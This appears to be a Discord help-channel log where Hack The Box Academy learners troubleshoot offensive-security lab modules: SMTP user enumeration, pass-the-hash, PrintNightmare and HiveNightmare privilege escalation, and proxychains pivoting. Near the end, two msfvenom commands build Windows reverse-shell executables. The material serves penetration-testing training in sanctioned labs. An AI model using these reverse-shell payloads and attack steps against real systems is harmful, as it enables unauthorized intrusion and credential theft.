Are you sure you're still connected to the VPN? Since you switched from the Pwnbox to your own machine, you need the OpenVPN connection active to reach the target
Yeah i pinged
Can you share your enum command?
smtp-user-enum -M VRFY -U Téléchargements/footprinting-wordlist.txt -w 30 -t 10.129.26.18
Now i'm on the HTB's Machine, just run that
it will take a while
cause on my machine i've that :
Remember that some SMTP servers have higher response times
So if -w 30 is not working, maybe try -w 60 or more
hi everyone, how hard is cpts exam
Also, if smtp-user-enum continues to give you 0 results, remember that there are other ways to enumerate SMTP users. Even if you haven't covered them in the module, you know that Nmap has scripts, or you can try an appropriate Metasploit module. Sometimes one tool fails where another succeeds due to how they handle timeouts or specific server responses.
Still no idea how to solve the server problem, please help someone
P.S. If anyone has completed the AI Privacy module, please DM me
Between 15-25 seconds has been the most reliable, note that its the timeout so if it receives a response before that, it wont wait the full time
Hi everyone! Can anyone help with the Password Attack - Pass the Hash - question 4? Why is it that when I connect via RDP as Administrator and then use David's hash in Mimikatz for PtH, I can access David's shared folder, but when I connect via RDP directly using David's hash, the share is not accessible?
Also, why does the whoami command still show Administrator even though I performed Pass-the-Hash (PtH) for David?
Hello guys am stuck in this nmap hard lab for the past 3 days can someone help me
Try a different endpoint.
supplier? no hit
Check the paragraph before the Prevention paragraph in the section content. Should get you pointed in the right direction.
anyone experienced in cookie hijacking, cuz need help
Hi guys, I am on module/143/section/1484. I am trying to request a TGT using gettgtpkinit.py following the examples, but I am getting
Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
  File "/opt/PKINITtools/gettgtpkinit.py", line 349, in <module>
    main()
  File "/opt/PKINITtools/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/opt/PKINITtools/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
  File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.20-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv
minikerberos.protocol.errors.KerberosError: Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)"
the lab should be configured to make it possible, anyone else getting this?
found the answer in #1234357888114364508
Hi I have a question, regarding ExtraSids attack is it required to use the SID of enterprise admin group to compromise the parent domain or is it for root domain like can I use domain admin SID if it's not the root domain just a parent domain
I can help u if u want
what wordlist did you use for this ? i tried these , though they dont have randomness
5-digits-00000-99999.txt
6-digits-000000-999999.txt
@unique rune I sent u a private message if u need me for the Nmap Hard Lab
I'd start with the smallest.
And you triggered it with the correct endpoint? I'm going to have to remove some of these posts as it's Tier 2 material. You can DM me.
yes, unless cleanup script, cause i've been bruteforcing for a minute now
more than 5 min
You can send a DM.
thanks, will do, in a hour or so... i'm about to commute home
Someone DM'd me for help and I pressed the ignore button by mistake, sorry 
ok. So in the WIndows Privesc module, working on kernel exploits, and so far I cannot get any of the examples to work. PrintNightmare allowed me to create a new user, and I can see it's got Administrator privilege when I run net user, but I can't switch to it.
and then I was able to run the hivenightmare to pull back the SAM hashes, but it says that the files are saved to c:\windows\temp but I don't have permission to access that folder.
finally, I was not able to get the maintenanceservice.exe reverse shell to work. I have all the configs properly on the malicious file, I was able to replace the mozilla service file, but then the reverse shell won't connect.
Hey all. I'm working through Attacking Common Applications - Web Vuln with Thick-Client. I'm trying to understand where the 10.10.10.74 IP comes from? When I try to log into the fatty client and monitor the traffic with Wireshark, I'm not getting that IP anywhere, unless I'm doing something wrong.
Hello, I'm having trouble with the SQL Injection Fundamentals Skills Assessment part. I've tried looking up some tutorials of it, but they seem to be outdated as they are not using the same login page to exploit. If anyone can point me in the right direction I would appreciate it.
it is thick
you can not do anything about it
You can dm if you want
sooo, the trouble was about Double Hop Problem and in new version of mimikatz it can receive TGT
In the enumerating password policies section of the AD module this section says minimum password length when domain is created is 7. Where are they getting this number from? The enum4linux output says minimum password length is 8 and doesn't mention about the default length when domain is created.
I got it, chained those command and done... thanks 
iirc you are supposed to answer the question from the section output
but they actually didn't mention it anywhere i think
OK, what do I do. I'm absolutely getting nowhere with 'Attacking Common Applications -> Exploiting Web Vulnerabilities in Thick-Client Applications'
this the skills assessment of sql injection intro is there something i did wrong or is there a problem with HTB?
either the thing doesn't run, the modifications aren't doing what they're intended to. There's no explanation as to why or what we're doing so I have no idea how to debug it or otherwise help myself out of this mess. What should I do?
I thought I could just 'muscle through it' but this is getting worse and worse.
are you using the burpsuite chrome or the locally installed chrome?
that... wasn't really a yes or no question...
this is the normal output i get
the answer is neither
this is microsoft edge with no burpsuite
OK, I don't know. I thought I could help with that one and I cannot. I'm sorry.
thats sad i am going to do another module till then
you should do that too
go take an easier one like a break
Looks like that might be the play for both of us.
yes
like why does HTB SHOVE parrot OS down our throat around every corner like most of us have kali
I feel like I need a 4-year degree in computer science with a Java specialty to fully understand the Attacking Common Application 'Exploiting Web Vulnerabilities in Thick-Client Applications'. I even watched the IppSec video for 'fatty'. My background is heavy on network/servers and not much in programming, so not sure if there are any other supplemental resources, especially if there is a lot of programming in the cpts exam.
I have some background in java programming but this is very different from that.
y'all are making me scared of whats to come in my HTB journey
no. This situation is an outlier. This is not normal.
99% of HTB content is waaay better than this.
hmm well i think i am going to put learn javascript and java on my todo list
just know that Java and javascript are different.
javascript takes many syntactic inspirations from java, but beyond that, they're really not related.
yes hence the "and"
I only point it out because many people I've come across don't understand that.
But, yes, understanding both of those languages would be a major benefit.
Also, if you've got the motivation; The C Programming language. So many languages build off of its principles that it is very much in your interest to have an understanding of that one.
Especially for lower level exploitation techniques such as buffer overflows and the like.
thanks i knew that i needed to understand assembly for reverse engineering but this is the first time i hear of C
Hello everyone, currently doing file transfers module and the question is:
Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.
I've RDPed into the Windows target and run the commands i attached to this message, but i manage to transfer the file but not actually get the hash the module wants...
May anyone help?
easy you dont seem to have read privileges to that file
How do i set them? I'm real bad with windows lol
me too, i'm really comfortable with linux but i hate windows
thx btw i'm trying rn
btw this is cmd
it seems u are running on powershell for it to be as close as possible to linux correct?
Hi guys, does anyone have resources to RDP through kerberos with xfreerdp? Tried this one but doesn't work for me: https://www.redteaming.org/rdpkerberos.html
yeah i feel more at home
did it work? the command i gave or did it error out?
gimme a sec the rdp service crashed i'm moving the file again
$acl = Get-Acl "C:\Users\User\Desktop\file.txt"
$rule = New-Object System.Security.AccessControl.FileSystemAccessRule("User","Read","Allow")
$acl.AddAccessRule($rule)
Set-Acl "C:\Users\User\Desktop\file.txt" $acl
run this instead
you are using powershell
powershell is different than normal cmd
I've set the read permission but it still says the same thing
ooooh
You added an extra slash to the end
that
It turns into a directory instead of a file
its a .txt
it's a freaking directory
It has d
Lol directories with extensions
thanks guys
i am a dumb ass and was trying to get the directory hash
is it a directory and what changed if it was a directory
Wym
oh so you were pointing it to the directory instead of the file
The directory was named with .txt it just looks like a file
Did you name that directory?
yeah i don't know why while i was moving the file using ftp i specified the output to be .txt
so i was trying to get the hash of it but as it was a zip i would obviously get a directory
metasploit module so easy
Anybody having issues with loading pwnbox instances?
nevermind the CLI is literally just connected pwnbox
None of the tool outputs in that section are giving minimum password length of 7 when domain is created; that's why I was confused.
Anyone knows about this one ?
Hello I'm having issue in AEN module
Is it not working fine??
The instances are not opening
Or take forever to open
I'm in the same boat. Have attempted the module numerous times, for some reason, I can't log into the fatty client. I edit the hosts file, remove the hashes, change beans, etc...... Nothing I do is working.
Yeah, I've figured that part out and I can get it working 100% of the time, now. But the rest of it is really tripping me up.
@scenic arrow can I dm you?
Yaa, DM me.
can someone explain how, on footprinting smtp, ||sudo smtp-user-enum -M RCPT -U footprinting-wordlist.txt -t 10.129.23.157 -v|| gives no results but ||sudo smtp-user-enum -M RCPT -U footprinting-wordlist.txt -t 10.129.23.157 -v -w 20|| does?
i have this problem can you help me bro
└─$ proxychains4 smbclient -L //172.16.119.10/ -U 'nexura.htb/hwilliam'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:9050 ... timeout
[proxychains] Strict chain ... 127.0.0.1:9050 ... timeout
do_connect: Connection to 172.16.119.10 failed (Error NT_STATUS_CONNECTION_REFUSED)
i don't know where is the problem i configured the file proxy good and i do a lot of things to fix this problem and it doesn't work in Skills Assessment - Password Attacks
i had the same issue with onesixtyone and its probably because the server doesn't answer exactly immediately so the tool assumes the user doesn't exist
as-rep roasting is not present in AD attacks module ?
It is
It's under the Miscellaneous Misconfigurations section
Hey I'm on the kernel exploits for windows priv escalation and I'm stuck on this. I don't know why this exploit isn't giving me the right permissions for the file
I'm expecting it to give me winlpe-ws02\htb-student:(F) but... it's not
Has anyone else ever had this issue?
what about silver ticket attacks?
I think that ones in Kerberos attacks
ohk I was going through oscp syllabus and couldnt find it on AD attacks
I thought it covers everything
You thought what covers everything?
the ad attacks module
It might have silver ticket in there I'm not sure. If that module covered everything there wouldnt be much point to the rest of the AD modules
there was golden ticket which is used to abuse Trust attacks but i didn't see silver ticket in AD Enum & Attacks module
Please ask in #1467192495778566447 or #boxes
Hey guys, I would need some help with the IMAP / POP3 section in the footprinting module, it's for the 5th question "find the admin email". I tried to enumerate everything I could but I didn't find it. Ofc it's not a bug and I'm missing something, if someone could help me with a hint or something please
the section did not show how to retrieve Email Body, you can check HTB Forums for a lot of people referring to various sources on how to retrieve it, one of them is https://forum.hackthebox.com/t/footprinting-imap-pop3/250254/22
if you still can't get it, you can DM me
Well, it does take 1 google to figure it out 
yep, that is right just making sure people don't forget HTB Forums still exist haha
I don't like referencing them cos you never know when they'll finally be taken down and someone searches the channel for the same problem and finds a link to the forum...
i hope they won't be taken down, it is still useful
Ok cause i got it thanks to question 6 bahahah, but i don't think it was the way attemp by htb x)
it is just made like this to encourage to search and learn
Stuck on what should be a very easy question, not sure if there is an issue with the question or with me.
Question: What is the content of the first line in the healthcheck.log file on the Windows target?
Only 1 file with the given name on the target:
john@WIN01 C:\Users\john>powershell "Get-ChildItem -Path C:\ -Filter 'healthcheck.log' -Recurse -ErrorAction SilentlyContinue
Directory: C:\
Mode LastWriteTime Length Name
-a---- 2/6/2026 4:14 AM 849628 healthcheck.log
first line from what I can tell:
PS C:\Users\john> cat C:\healthcheck.log
System health check at 2025-02-24 14:26:46 - CPU Usage: 12%
PS C:\Users\john> gc C:\healthcheck.log -TotalCount 1
System health check at 2025-02-24 14:26:46 - CPU Usage: 12%
copy/pasting the line is not the correct answer, just the CPU usage part is not the answer, just the part preceding the - is not the answer, I'm not sure what I have done wrong. I am definitely on the correct target, as the second confirmation of the first line (using gc) was done on a fresh ssh to the target ip in the module for safety.
wrong file location, check the other directory (yes they have the same filename, it's stupid)
Thanks, that worked. I am wondering why recursive search from C:\ doesn't find the other one, recursive search from C:\ProgramData does, but I expected from C:\ should find all matches in directories that I can access.
anyone around for a question on injection attacks, section "LDAP - Data Exfiltration & Blind Exploitation" ?
Have the same problem, any solution?
I can help when I get home. DM me
the Web Attack skill assessment was fun besides finding the user to escalate to....
I gave up on that part after able to do everything, updating password of others and such
my dumbdumb was just reading the username
.....
you can dm me
It's okay i got the username and everything went smooth sailing with chatgpt xD
Thank you i just wanted to rant
oh okay
Hi, I'm having issues in network foundation section in CJCA with What manages multiple cell towers in cellular networks? (Format: three words) question where i put in Base Station Controllers it keeps giving me incorrect answer. Please Let me know where I went wrong
are you guys having issues when using rdp to windows hosts? it just works really badly for me for a long time whether I use a different network or mine
Hello world, I'm currently doing the SOC path and I'm stuck on the "Detection and Analysis part 1" module. The password they provide does not work when I try to authenticate to the IP with the provided user. Can anyone help?
To those who have taken the CPTS exam, did you guys encounter the "clock skew too great" error?
I am going through the Attacking Enterprise Networks module and nothing is fixing this error. I've tried the following and nothing has fixed it. I am thinking that I will need to restart the whole environment, which really sucks because I am so deep in and would suck even more if it happened on the exam.
sudo timedatectl set-ntp false
sudo ntpdate -u <ip>
sudo rdate -n <ip>
I forget the syntax but ik you can use faketime
I tried it, but it didn't work. Resetting the target fixed it...
hello
anyone tried to write a bash script for WebAttacks final SA?
I've completed the module and SA, but have a question about my script
its singular not plural
I am doing the pivoting module, got huge issues using xfreerdp on my own VM. I can see the connection going on, using ssh forwarding, then trying to use proxychains4 with xfreerdp to connect through the pivot host.
Any tips?
Pretty sure you have to combine socks with port forwarding to get that to work properly.
Which section are you on? Make sure you have set the dynamic port through the pivot host first and keep that process active... ssh -D .... Think about it like any routing problem. The route needs to be specified to somewhere at each step
I'm also having too many problems with clock skew, I'm being forced to do many attacks from the windows machine directly
Anyone can help?
Using the tools faketime, or ntpdate will help with clockskew
I always use ntpdate but seems to not work for me with proxychains
have you ever gotten the error of "no eligible servers" when you try ntpdate?
Hi guys I have just started pen test path and I cannot run commands or ping IPs mentioned in the notes. I am using pwn can anyone help
You spawn the target and use that IP, not what's in the notes
Like there is no option to spawn the target. I am not talking about machines or labs. This pen testing path in academy
Which module and section is this?
Pen testing getting started page 7 service scanning
looks like there's a target to me
Let me check that
I'm on the Kernel exploits for Windows Privilege Escalation, and this step of the guide doesn't seem to work
I don't know why the exploit is not showing my user's entry in icacls
This is the 10th time or so I've tried this
You doing this as the new local admin user you created?
only one of the shown exploits will actually work iirc
Am I supposed to do the Invoke-Nightmare stuff before I run this CVE? The way the question is presented, I read it as "try all 3 and see which one works"... I've been successful before making that admin user, but I can't switch to it so I gave up trying to do that.
As far as I can remember only one of the exploits actually really works, it's just telling you to try all 3 because that's what you would do after enumerating the environment
Ok... Yeah, I haven't been able to get any of them to work
It's the print nightmare one that should work
how do you switch to the user once you make it?
Wait no nvm it's the other one HiveNightmare
wdym? just use runas or rdp as that user
I tried to rdp into that user and it won't work
might have to change a registry setting that prevents administrators from RDPing, but otherwise runas should work just as well
Yeah that doesn't work either. It tells me the password I made for it is wrong

try this
runas /env /profile /user:hacker powershell
One sec spinning up the module now
sorry my VM froze,
but @waxen totem that the attacks may not be there, like the point is to try all three even if only one of them works
It does mention This privileged file write needs to be chained with another vulnerability, such as UsoDllLoader or DiagHub to load the DLL and escalate our privileges. However, the UsoDllLoader technique may not work if Windows Updates are pending or currently being installed, and the DiagHub service may not be available.
check the service
Get-CimInstance -ClassName Win32_Service | Where-Object { $_.Name -eq "DiagHub" }
other than that idk
So I restarted the device a third time, and it worked this time
but even with having Administrator group membership, it doesn't let me have access to C:\Users\Administrators\Desktop
[RESOLVED, use ligolo-ng] Doing the AD module Skills Assessment Part1 got the admin hash via DCSync although I can't access DC01 like evil-winrm connects and then dies after I type the command. Doing this last question (Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise.)
I tried resetting the lab etc. I will try switch vpns now though.
I'm doing all the pivoting via metasploit/meterpreter as I used it to do the reverse shell.
[RESOLVED, use ligolo-ng] I think I might have configured both the socks proxy and port forward (although I would assume that it wouldn't matter as you will use either technique not both?)
Hey guys! I'm stuck on an exercise in Password Attack/Pass the Ticket (PtT) from Linux.
I'm trying to get the NTLM hash from the keytab file with the tool KeyTabExtract.py, but it only gives me the AES-256
With it I could potentially forge the TGT ticket and going with a Pass the Hash attack, but if I'm not wrong I'd need a windows box with Rubeus or Mimikatz, and in this exercise they didn't give us any. Also all of this looks suspiciously hard
I think it's a bug and I have to reset the box and do everything again. But if you have any suggestions I'd appreciate them!!
Hi
Check the other keytab file in that directory
[RESOLVED, use ligolo-ng] Tried using just socks proxy nmap works fine then evil-winrm doesn't even run the first command:
[RESOLVED, use ligolo-ng] continues to timeout
Is misusing DCOM present in ad enum & attacks?
i think it is better to just do the module and find out
I am on it
then why do you need if anything is present on it, just read about it
I didnt really see any section for it and I planned to skip some sections so I asked
if you don't see it then it is not present, simple as that, you can just go through sections quickly, it won't take much
Aight
Hi everyone,
since Thursday I've been stuck in the Attacking Common Applications module because the systems in the Questions section take forever to spawn and then respond so slowly that they're basically unusable. This particularly affects the Splunk and PRTG parts.
A few days ago there was an announcement about technical issues, but it's marked as resolved now. My VPN connection is up and stable, and I can ping the targets without any problems. For the Splunk questions, I also considered that a VHOST configuration might be required, but even with that in mind the systems are still extremely sluggish.
Are there any known issues at the moment? Or is there simply very high demand right now?
Up until now, Hack The Box Academy has always worked flawlessly for me, so this is pretty frustrating.
Thanks in advance for any help
Try using a different VPN region. This often helps.
Switching to a different VPN region didn't help. Then I re-downloaded the OVPN file directly next to the Questions section, and that did the trick. Sometimes it really is that simple... Thx a lot!
Anyone around for a question on Injection Attacks - Exploitation of PDF Generation Vulnerabilities?
nvm I think I figured it out
Does netexec/crackmapexec work for anyone with chisel SOCK proxy?
If i target one specific port with port forwarding it works, but doesn't work with socks proxy
Hey, I am doing the PentestInNutshell module, Windows Target, and I have added the user to the administrators group however, I still don't have access to the C:\Users\Administrator folder, am I missing something?
You may have not added it correctly, check if it is in the administrators group with "net user <user>"
When I check, it is there. And it keeps being there since it is injected in the code of the scheduled task
how can i give some feedback for a specific module?
i'll just shoot it out here:
Windows skill assessment in the module windows fundamental...
just finished it. Bad thing: those steps 1-8 are poorly described in my opinion. I feel a bit more explanation could have helped me. For example: I need to create a group. And then change permission of Files. So I assumed, since I created a new group, I will modify the permission of the newly created group. However, I noticed that, I needed to change permission of another group. Good things: The solution helps a lot and was needed in my case. Loved the red arrows pointing exactly where I need to press.
Thank you man!! omgg
I'm still struggling with it (PtT from Linux) tho... I can't access the dc01 shares even if I try both the ccache file available for the user Julio!
check dm
Alright, it works. I forgot I had to open a new terminal for it to work.
Check DM
I selected all three possibilities, and yet I am still submitting the wrong answer:
" Inspect the ICMP_smurf.pcapng file, part of this module's resources, and enter the total number of attacking hosts as your answer."
nevermind, figured out my blunder
hi I'm feeling desperate.. Before starting, this is briefly about cracking a password with John the Ripper. I understood the whole theoretical principle. Now below there is a question: "Find a password using single mode." At first, I thought I had to connect to a system, then find the users in passwd for example, or go to shadow to find a hash and then use John on that list.
Then I opened the terminal with the instance provided in HTB. After researching, I realized that I did not need to connect to any system, but just crack the hash. I tried john --single to crack the password, but I found nothing.
Now the next question asks me to use wordlist mode, but I only have the username. Where am I supposed to find the hash? I really do not understand the exercise, and I have been stuck on it for days. Please, I need some help. And why doesn't it work with the single mode from john, although the exercise says to try it with this mode? I tried to change the wordlist, so using the rockyou list, and it doesn't work with both of them
so you are probably in password attacks module, firstly, you don't have to connect to system to crack a hash using single mode, having the hash from the shadow file is just enough which HTB already provided us with, and for the next exercise, most of the times rockyou.txt will do the work, but if the section taught about rules, then you probably should use rules with them like best64.rule
can someone help with this
RDP and SOCKS Tunneling with SocksOverRDP
the proxifier doesn't catch any traffic
I was doing some labs. Tell me this: if you've run BloodHound through proxychains, or if you have to run it in this kind of case, do you usually transfer the BloodHound binary to the target and run it from there? Or how do you usually do it?
The public-facing IP is a web machine, so LDAP and similar services won't be available for authentication there. Pivoting is mandatory. Because of that, nxc --bloodhound is timing out, while everything else is working fine.
anyone doing the Attacking common applications ~ Application Discovery & Enumeration and doing the eyewitness scan met with this. I tried curling just the header it works but curling the entire page met with hanging ~.~
I did add the vhosts to my /etc/hosts file ..
it seems like I could only curl the default vhost and not other vhosts
```
##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting. Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost
10.129.30.250 app.inlanefreight.local dev.inlanefreight.local drupal-dev.inlanefreight.local drupal-qa.inlanefreight.local drupal-acc.inlanefreight.local drupal.inlanefreight.local blog.inlanefreight.local
```
Any suggestions would be great
module: SQL injection fundamentals skills assessment
i was able to successfully create an account, but after that i tried couple of potentially vulnerable injection parameters, but none of them worked, would appreciate a nudge
can I copy the tools provided on windows and linux machines in AD enum&attacks module? I wish to have a copy on my machine.
Hey guys, windows evasion SA 2 can anyone give me a nudge i tried two ways
- Reverse shell execution via VBscript
- Read the content from the user who run the file vbs file and write the content to C:\Windows\Tasks \flag.txt but access denied while opening
is there any other possible way
Attacking Common Applications PRTG section. I can't get code execution to work. Can someone help
@jovial walrus Please take care not to post content from modules above tier 0
Guys I still need help with the hard nmap lab can someone help me
I worked on this one today and spent what I would consider way too long on the solution lol
If you read the IDS/IPS section from top to bottom, you will solve it within a few minutes
Two final tips I'll give are: 1. Don't go down any rabbit holes, if a method doesn't work immediately, keep moving 2. Remember to use 'sudo' for all your commands
My only problem is there is this command -S i know there has to be something with it and it doesnt work for me like it did in the section
I did exactly what you said but it doesn't work..this is the problem and I still don't understand the next exercise. How can you only with the username crack the password...I mean you need this system, the user use
You don't, you don't have to have AD or windows environment to get AES or NTLM hash, hashing is some kind of mathematic formula to turn plaintext into hash that can not be reverted, I think there is misunderstanding in your concept
The same applies for linux
I understood the concept well. I obtained the hash and saved it in a file called hash.txt, then I ran john hash.txt, but I can't find anything. Then the second exercise only says: Use wordlist-mode with rockyou.txt to crack the RIPEMD-128 password. I don't understand anything. I've been stuck on this small exercise for days, even though I already understood all the concepts with John the Ripper.
try pwnbox then
@gray yacht have you done the new Skills assessment for the SQL injection fundamentals module
DM me
hi can anybody explain
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.222.128 LPORT=4447 -f exe -o shell.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.159 LPORT=1338 -f exe -o shell.exe
why does the second one work when the first one doesn't?
what do you mean with that? i don't see other option
sorry I'm a beginner
yeah probably you should do some fundamentals modules, then you should be good to go
i mean i'm a beginner in HtB i understood much things but i can't solve the problem. I don't think the problem is about getting back to the background ...i thank you for your help. I will figure out how to solve it
The LHOST is different, the LPORT is different.
Cannot tell if it's a user mistake or not from these.



